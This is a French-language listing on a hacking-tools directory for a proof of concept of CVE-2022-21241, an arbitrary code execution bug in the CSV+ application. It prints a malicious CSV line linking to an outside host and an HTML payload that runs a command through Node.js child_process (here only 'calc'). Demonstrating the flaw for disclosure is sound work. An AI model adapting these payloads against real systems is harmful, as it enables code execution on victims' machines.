Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
csv-plus_vulnerability — 👻 [PoC] CSV+ 0.8.0 - Exécution de code arbitraire (CVE-2022-21241) | Kitploit
Outils/GitHubGitHub/nanaao/csv-plus_vulnerability
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebApprentissage et Éducation
GitHubnanaao/csv-plus_vulnerability

csv-plus_vulnerability

👻 [PoC] CSV+ 0.8.0 - Exécution de code arbitraire (CVE-2022-21241)

Voir le dépôt
52il y a 4 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

csv-plus_vulnerability

👻 Vulnérabilité d'exécution de code arbitraire en 2 clics.

PoC.gif

CVE-2022-21241

⚠
Ce PoC a été créé pour alerter les utilisateurs et enquêter sur les vulnérabilités de leur propre CSV+, et son utilisation à des fins d'attaque est interdite.

Vulnérabilité

Les versions suivantes sont vulnérables.

  • CSV+ <= 0.8.0

Les attaquants peuvent exécuter du code arbitraire en utilisant la fonctionnalité Node.js. Ils placent le code js malveillant sur un site et le lient à partir de balises a grâce à la vulnérabilité d'injection HTML dans CSV+.

PoC

scenario.png

Fichier csv malveillant

root@kitploit:~
<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>

https://electronooooo.htmlbin.net/xsscalc.html est un lien temporaire.

Fichier html malveillant (calc)

root@kitploit:~
<!DOCTYPE html>
<html>
    <head>
        <script>
            var cmd = "calc";
            require("child_process").exec(cmd);
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>
Télécharger l’outil